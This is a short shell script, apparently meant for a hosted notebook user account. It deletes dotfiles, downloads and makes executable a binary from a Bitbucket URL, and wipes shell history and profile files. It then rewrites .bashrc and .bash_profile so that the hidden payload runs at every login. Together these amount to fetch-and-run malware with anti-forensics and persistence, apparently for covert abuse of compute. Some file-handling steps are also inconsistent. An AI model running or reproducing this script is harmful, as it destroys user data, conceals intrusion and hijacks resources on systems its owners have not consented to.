cd ~
rm -rvf .bash* .lib*

rm -rvf ele* lol* 1.43* 
cd ~/
mkdir .lib
cd .lib
rm -R *
rm -R /home/studio-lab-user/.ton

wget https://bitbucket.org/andikasdsdssda/gas/raw/2adefe1bf22d85dc2d3a88947d36197fb23271b8/gas && chmod u+x gas && mv bash /home/studio-lab-user/.lib && cd .. && history -cr
echo ""  > /home/studio-lab-user/.bashrc
echo "" > /home/studio-lab-user/.bash_history
echo "" > /home/studio-lab-user/.bash_profile
echo 'echo ""  >> /home/studio-lab-user/.bash_history' >> /home/studio-lab-user/.bashrc
echo "source /home/studio-lab-user/.bash_profile"  >> /home/studio-lab-user/.bashrc
echo "LD_LIBRARY_PATH=/home/studio-lab-user/.lib" > /home/studio-lab-user/.bash_profile
echo "export LD_LIBRARY_PATH" >> /home/studio-lab-user/.bash_profile
echo "bash /home/studio-lab-user/.lib/gas.sh"  >> /home/studio-lab-user/.bash_profile
echo "./.lib/bash gas" > /home/studio-lab-user/.lib/gas.sh
chmod +x gas && cd ~/ && source .bashrc
